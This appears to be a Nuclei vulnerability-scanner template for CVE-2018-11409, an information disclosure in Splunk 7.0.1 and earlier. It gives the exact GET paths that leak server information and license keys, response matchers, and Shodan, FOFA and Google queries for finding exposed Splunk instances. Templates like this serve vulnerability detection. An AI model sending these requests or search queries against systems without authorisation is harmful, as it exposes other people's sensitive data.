nuclei-templates/http/cves/2018/CVE-2018-11409.yaml

50 lines
1.8 KiB
YAML

id: CVE-2018-11409
info:
name: Splunk <=7.0.1 - Information Disclosure
author: harshbothra_
severity: medium
description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
remediation: |
Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.
reference:
- https://github.com/kofa2002/splunk
- https://www.exploit-db.com/exploits/44865/
- http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148
- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
- http://www.securitytracker.com/id/1041148
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-11409
cwe-id: CWE-200
epss-score: 0.83856
epss-percentile: 0.98466
cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: splunk
product: splunk
shodan-query: http.title:"login - splunk"
fofa-query: title="login - splunk"
google-query: intitle:"login - splunk"
tags: cve,cve2018,edb,splunk
http:
- method: GET
path:
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
matchers-condition: and
matchers:
- type: word
words:
- licenseKeys
- type: status
status:
- 200
# digest: 4a0a00473045022100cf46cae11d86cd1de5f9dadb6eaacc3a59275c483617d1b09f441671815032620220701cf5a3bee3b755f16c7a9cd42976913debedf9914a004e5acc5ab96c9820ec:922c64590222798bb761d5b6d8e72950